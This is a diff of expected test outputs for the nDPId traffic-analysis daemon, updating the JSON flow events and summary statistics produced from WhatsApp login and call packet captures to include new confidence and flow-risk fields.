-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
-00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00842{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}}
+00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00171{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","total-events-serialized":362}
@@ -364,13 +364,13 @@
 ~~ packets captured/processed: 1253/1251
 ~~ skipped flows.............: 0
 ~~ total layer4 data length..: 132660 bytes
-~~ total detected protocols..: 34
+~~ total detected protocols..: 35
 ~~ total active/idle flows...: 57/57
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4750183 bytes
-~~ total memory freed........: 4750183 bytes
-~~ total allocations/frees...: 101030/101030
+~~ total memory allocated....: 4809376 bytes
+~~ total memory freed........: 4809376 bytes
+~~ total allocations/frees...: 102620/102620
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 176 chars
 ~~ json string max len.......: 2430 chars
diff --git a/test/results/whatsapp_login_chat.pcap.out b/test/results/whatsapp_login_chat.pcap.out
index 6c7d77a8d..dd127e55d 100644
--- a/test/results/whatsapp_login_chat.pcap.out
+++ b/test/results/whatsapp_login_chat.pcap.out
@@ -1,64 +1,64 @@
 00451{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582377898,"flow_last_seen":1432582377898,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1432582377898,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_login_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432582377898,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1432582377898,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABI56kAAEARDKvAqAIBwKgC\/+EV4RUANKgAU3BvdFVkcDCYJeGQmjjiDQABAARIlcID1NylhjSgAeWF26p2NNVFJFGe2SE="}
